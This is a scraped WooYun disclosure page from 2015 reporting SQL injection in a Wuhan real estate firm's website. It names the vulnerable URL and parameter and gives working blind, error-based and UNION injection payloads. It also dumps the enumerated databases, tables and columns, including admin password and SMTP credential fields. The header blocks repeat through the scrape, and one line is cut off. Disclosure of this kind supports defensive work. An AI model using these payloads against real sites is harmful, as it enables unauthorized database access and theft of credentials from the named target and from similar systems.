21世纪不动产地产SQL注入漏洞 | wooyun-2015-0136749| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0136749

漏洞标题：21世纪不动产地产SQL注入漏洞

漏洞作者： jobf

提交时间：2015-08-25 10:54

修复时间：2015-10-09 10:56

公开时间：2015-10-09 10:56

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-25：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-10-09：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

21世纪不动产地产SQL注入漏洞，

详细说明：

注入点:http://www.c21wuhan.com.cn/news.html?types=1

Parameter: types (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: types=1 AND 8602=8602
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: types=1 AND 2493=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(112)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (2493=2493) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(122)+CHAR(113)))
    Type: UNION query
    Title: Generic UNION query (NULL) - 13 columns
    Payload: types=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(77)+CHAR(120)+CHAR(100)+CHAR(69)+CHAR(121)+CHAR(90)+CHAR(69)+CHAR(105)+CHAR(109)+CHAR(108)+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
Database: ReportServerTempDB
[9 tables]
+-----------------------------------------------------+
| ChunkData                                           |
| ChunkSegmentMapping                                 |
| ExecutionCache                                      |
| PersistedStream                                     |
| Segment                                             |
| SegmentedChunk                                      |
| SessionData                                         |
| SessionLock                                         |
| SnapshotData                                        |
+-----------------------------------------------------+
Database: msdb
[136 tables]
+-----------------------------------------------------+
| MSdatatype_mappings                                 |
| MSdbms                                              |
| MSdbms_datatype                                     |
| MSdbms_datatype_mapping                             |
| MSdbms_map                                          |
| backupfile                                          |
| backupfilegroup                                     |
| backupmediafamily                                   |
| backupmediaset                                      |
| backupset                                           |
| log_shipping_monitor_alert            
Database: zjxh
[2 tables]
+-----------------------------------------------------+
| AgentBlackList                                      |
| Users                                               |
+-----------------------------------------------------+
Database: Houses
[106 tables]
+-----------------------------------------------------+
| Advertising                                         |
| AdvertisingTypes                                    |
| Agent                                               |
| Area                                                |
| Brand                                               |
| BusinessCircle                                      |
| CSBuilding                                          |
| CSBuildingImage                                     |
| CSRentalRoom                                        |
| CSRentalRoomImage                                   |
| CSSecondhandRoom                                    |
| CSSecondhandRoomImage                               |
| City                                                |
| DecorateTypes                                       |
| Department                                          |
| DepartmentImg                                       |
| Disclaimer                                          |
| EntrustInfo                                         |
| FoundationInfo                                      |
| Job                                                 |
| Link                                                |
| News                                                |
| NewsType                                            |
| Position                                            |
| PositionTypes                                       |
| PropertyType                                        |
| PropertyUse                                         |
| Resume

漏洞证明：

Parameter: types (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: types=1 AND 8602=8602
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: types=1 AND 2493=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(112)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (2493=2493) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(122)+CHAR(113)))
    Type: UNION query
    Title: Generic UNION query (NULL) - 13 columns
    Payload: types=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(77)+CHAR(120)+CHAR(100)+CHAR(69)+CHAR(121)+CHAR(90)+CHAR(69)+CHAR(105)+CHAR(109)+CHAR(108)+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
Database: ReportServerTempDB
Database: zjxh
[2 tables]
+-----------------------------------------------------+
| AgentBlackList                                      |
| Users                                               |
+-----------------------------------------------------+
Database: Houses
[106 tables]
+-----------------------------------------------------+
| Advertising                                         |
| AdvertisingTypes                                    |
| Agent                                               |
| Area                                                |
| Brand                                               |
| BusinessCircle                                      |
| CSBuilding                                          |
| CSBuildingImage                                     |
| CSRentalRoom                                        |
| CSRentalRoomImage                                   |
| CSSecondhandRoom                                    |
| CSSecondhandRoomImage                               |
| City                                                |
| DecorateTypes                                       |
| Department                                          |
| DepartmentImg                                       |
| Disclaimer                                          |
| EntrustInfo                                         |
| FoundationInfo                                      |
| Job                                                 |
| Link                                                |
| News                                                |
| NewsType                                            |
| Position                                            |
| PositionTypes                                       |
| PropertyType                                        |
| PropertyUse                                         |
| Resume                                              |
| TowardTypes                                         |
| View_Advertising                                    |
| View_Agent                                          |
| View_CSBuilding                                     |
| View_Department                                     |
| View_Disclaimer                                     |
| View_EntrustInfo                                    |
| View_FoundationInfo                                 |
| View_Job                                            |
| View_Link                                           |
| View_News                                           |
| View_Resume                                         |
| View_WHBuilding                                     |
| View_YCBuilding                                     |
| View_answer                                         |
| View_csczfandarea                                   |
| View_csdepczf                                       |
| View_csdeprsf                                       |
| View_csrentalroom                                   |
| View_csrsfAndarea                                   |
| View_cssecondhandroom                               |
| View_czfAndarea                                     |
| View_depczf                                         |
| View_deprsf                                         |
| View_info                                           |
| View_infobigtype                                    |
| View_infotype                                       |
| View_lpnews                                         |
| View_noywhb                                         |
| View_print                                          |
| View_question                                       |
| View_quetionAndUser                                 |
| View_rsfAndarea                                     |
| View_wdsmalltype                                    |
| View_whczflist                                      |
| View_whdepczf                                       |
| View_whdeprsf                                       |
| View_whrentalroom                                   |
| View_whrsflist                                      |
| View_whsecodhandroom                                |
| View_ycczfandarea                                   |
| View_ycdepczf                                       |
| View_ycdeprsf                                       |
| View_ycrentalroom                                   |
| View_ycrsfAndarea                                   |
| View_ycsecondhandroom                               |
| View_ywhb                                           |
| View_ywhblog                                        |
| WHBuilding                                          |
| WHBuildingImage                                     |
| WHRentalRoom                                        |
| WHRentalRoomImage                                   |
| WHSecondhandRoom                                    |
| WHSecondhandRoomImage                               |
| YCBuilding                                          |
| YCBuildingImage                                     |
| YCRentalRoom                                        |
| YCRentalRoomImage                                   |
| YCSecondhandRoom                                    |
| YCSecondhandRoomImage                               |
| answer                                              |
| daikan                                              |
| info                                                |
| infobigtype                                         |
| infotype                                            |
| jylc                                                |
| jylcmx                                              |
Database: JJDC1
Table: manager66
[33 columns]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| ADMIN       | nvarchar |
| ads         | nvarchar |
| banner      | nvarchar |
| dateandtime | datetime |
| dc          | nvarchar |
| gbook       | nvarchar |
| gl_old      | nvarchar |
| gonggao     | nvarchar |
| house       | nvarchar |
| hyedetail   | nvarchar |
| hyetype     | nvarchar |
| id          | int      |
| id_key      | nvarchar |
| images      | nvarchar |
| ip          | nvarchar |
| jc          | nvarchar |
| jj          | nvarchar |
| job         | nvarchar |
| link        | nvarchar |
| member      | nvarchar |
| name        | nvarchar |
| newhouse    | nvarchar |
| news        | nvarchar |
| peigou      | nvarchar |
| person      | nvarchar |
| pingu       | nvarchar |
| pinguren    | nvarchar |
| pwd         | nvarchar |
| Sphouse     | nvarchar |
| Tjhouse     | nvarchar |
| Tjrecomco   | nvarchar |
| Type        | nvarchar |
| Zs          | nvarchar |
+-------------+----------+
Database: JJDC1
Table: News
[9 columns]
+---------+----------+
| Column  | Type     |
+---------+----------+
| Comment | ntext    |
| DNT     | datetime |
| FromW   | nvarchar |
| hits    | int      |
| imgname | ntext    |
| newsid  | int      |
| pl      | int      |
| sort    | int      |
| Topic   | nvarchar |
+---------+----------+
Database: JJDC1
Table: sz
[4 columns]
+----------+----------+
| Column   | Type     |
+----------+----------+
| id       | int      |
| pass     | nvarchar |
| smtp     | nvarchar |
| smtpuser | nvarchar |
+----------+----------+
Database: JJDC1
Table: Banner
[7 columns]
+------------+----------+
| Column     | Type     |
+------------+----------+
| Bz         | int      |
| Deseriptor | nvarchar |
| hits       | int      |
| LinkId     | int      |
| Picurl     | nvarchar |
| type1      | nvarchar |
| Web        | nvarchar |
+------------+----------+
Database: JJDC1
Table: gbook_back
[4 columns]
+-----------+----------+
| Column    | Type     |
+-----------+----------+
| back_date | datetime |
| back_id   | int      |
| back_meno | ntext    |
| id        | int      |
+-----------+----------+
Database: JJDC1
Table: cyte
[3 columns]
+----------+----------+
| Column   | Type     |
+----------+----------+
| cyte     | nvarchar |
| cyteName | nvarchar |
| ID       | int      |
+----------+----------+
Database: JJDC1
Table: Sp_movie
[14 columns]
+-------------+-----------+
| Column      | Type      |
+-------------+-----------+
| ID          | int       |
| pic         | nvarchar  |
| Sp_add      | nvarchar  |
| Sp_company  | nvarchar  |
| Sp_content  | ntext     |
| Sp_datetime | datetime  |
| Sp_Fax      | nvarchar  |
| Sp_mc       | nvarchar  |
| Sp_movie    | ntext     |
| Sp_Tel      | nvarchar  |
| Sp_time     | nvarchar  |
| Sp_Type     | nvarchar  |
| Sp_win      | nvarchar  |
| upsize_ts   | timestamp |
+-------------+-----------+
Database: JJDC1
Table: gonggao
[4 columns]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| content     | ntext    |
| dateandtime | datetime |
| ggtext      | nvarchar |
| id          | int      |
+-------------+----------+
Database: JJDC1
Table: NewHouse
[37 columns]
+---------------+-----------+
| Column        | Type      |
+---------------+-----------+
| Area          | nvarchar  |
| AvgPrice      | float     |
| BeginPrice    | float     |
| bimg          | nvarchar  |
| BusLine       | ntext     |eb server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
Database: Houses
Table: Advertising
[21 entries]

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0136749

漏洞标题：21世纪不动产地产SQL注入漏洞

相关厂商：21世纪不动产地产

漏洞作者： jobf

提交时间：2015-08-25 10:54

修复时间：2015-10-09 10:56

公开时间：2015-10-09 10:56

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 jobf@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0136749

漏洞标题：21世纪不动产地产SQL注入漏洞

相关厂商：21世纪不动产地产

漏洞作者： jobf

提交时间：2015-08-25 10:54

修复时间：2015-10-09 10:56

公开时间：2015-10-09 10:56

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0136749"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 jobf@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：